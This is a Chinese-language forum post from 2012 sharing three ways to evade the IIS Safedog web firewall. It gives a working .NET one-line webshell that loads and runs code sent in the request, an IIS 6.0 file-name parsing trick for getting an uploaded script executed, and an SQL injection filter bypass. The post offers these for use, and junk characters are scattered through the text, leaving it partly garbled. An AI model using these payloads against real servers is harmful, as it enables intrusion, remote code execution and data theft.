1、绕过IIS安全狗的一句话。" V' X* I8 V! B9 Q" j
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
& e$ h' h/ ~: S. ~# \& ]2 Q8 U<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。% c+ G8 a$ V& L. ^0 a
6 \$ p* e2 ?; a* v2 J- }2、IIS6.0解析漏洞遇到安全狗。/ q8 `, W. C. y
文件名为4 z0 w+ D! M( f( z& E
http://www.xxxxx.com/sh3llc0de.asp;1.jpg+ i" m' @% t8 e( Z6 a. x
" _, ]( Y4 b( U3 A这样的会被IIS安全狗果断屏蔽。
- C5 ]. H/ a& d. b ~2 s改成如下名称,IIS6一样会解析:
S7 {, ]2 b. W1 Xwww.xxxxx.com/;1.asp;1.jpg. d" J1 k0 ~$ m4 _- y8 W; D2 O
8 V. [/ J/ P4 m Z2 F# [
3、安全狗的注入绕过。
+ X# o+ `' c( E E4 }4 o常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
/ ]3 U7 f7 |8 W" w" q- j2 e但如果:: S, A8 l7 j! |1 s5 Q6 C- Y
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
/ M6 Y. c% R* J6 m就可以成功绕过了。1 s& D( i8 r/ o* Z1 K# Z' c
' e- |" T2 T; F L& E+ w: ?
# W6 ?( k" @( [3 y |
发表于 2012-10-31 08:25:30
收藏
支持
反对